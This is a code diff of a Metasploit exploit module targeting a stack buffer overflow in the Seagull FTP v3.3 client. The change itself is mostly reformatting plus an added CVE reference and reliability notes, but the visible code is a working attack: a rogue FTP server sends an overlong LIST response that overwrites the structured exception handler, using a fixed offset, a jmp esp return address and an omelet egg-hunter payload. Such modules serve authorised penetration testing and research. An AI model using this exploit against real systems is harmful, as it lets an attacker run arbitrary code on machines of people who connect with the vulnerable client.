@@ -10,42 +10,47 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Omelet
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow in the Seagull FTP client that gets
-        triggered when the ftp client processes a response to a LIST command. If the
-        response contains an overly long file/folder name, a buffer overflow occurs,
-        overwriting a structured exception handler.
-      },
-      'Author' 	 =>
-        [
+          triggered when the ftp client processes a response to a LIST command. If the
+          response contains an overly long file/folder name, a buffer overflow occurs,
+          overwriting a structured exception handler.
+        },
+        'Author' => [
           'corelanc0d3r <peter.ve[at]corelan.be>' # found bug, wrote the exploit
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2010-20007' ],
           [ 'OSVDB', '94556' ],
           [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread',
         },
-      'Payload'        =>
-        {
+        'Payload' => {
           'BadChars' => "\x00",
           'StackAdjustment' => -1500,
           'DisableNops' => true,
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           [ 'XP Universal', { 'Offset' => 232, 'Ret' => 0x7CE4650C } ], # jmp esp shell32.dll
         ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2010-10-12',
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '2010-10-12',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
   end
 
   #---------------------------------------------------------------------------------
@@ -54,14 +59,14 @@ class MetasploitModule < Msf::Exploit::Remote
     super
   end
 
-  def on_client_unknown_command(c,cmd,arg)
+  def on_client_unknown_command(c, cmd, arg)
     c.put("200 OK\r\n")
   end
 
-  def on_client_command_list(c,arg)
+  def on_client_command_list(c, arg)
     print_status("Handling LIST command")
     conn = establish_data_connection(c)
-    if(not conn)
+    if (not conn)
       c.put("425 Can't build data connection\r\n")
       return
     end
@@ -74,19 +79,19 @@ class MetasploitModule < Msf::Exploit::Remote
     crash = "A" * target['Offset']
     crash << [target.ret].pack('V')
 
-    #corelanc0d3r's omelet mixin
+    # corelanc0d3r's omelet mixin
     thepayload = ("\x90" * 30) + payload.encoded
 
     omeletoptions =
-    {
-      :eggsize => 123,
-      :eggtag => "00w",
-      :searchforward => true,
-      :reset => false,
-      :checksum => true
-    }
+      {
+        :eggsize => 123,
+        :eggtag => "00w",
+        :searchforward => true,
+        :reset => false,
+        :checksum => true
+      }
     badchars = '\x00'
-    omelet =  generate_omelet(thepayload,badchars,omeletoptions)
+    omelet = generate_omelet(thepayload, badchars, omeletoptions)
 
     omeletcode = omelet[0]
     print_status("[+] Omelet code : #{omeletcode.length} bytes")
@@ -102,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
       dirlist << "drwxrwxrwx    1 100      0           11111 Jun 11 21:10 #{thischunk}\r\n"
     end
     dirlist << "drwxrwxrwx    1 100      0           11111 Jun 11 21:10 #{crash}\r\n"
-    conn.put("total #{omelet[1].length+1}\r\n"+dirlist)
+    conn.put("total #{omelet[1].length + 1}\r\n" + dirlist)
     conn.close
     print_status(" - Wait for omelet hunter...")
     return
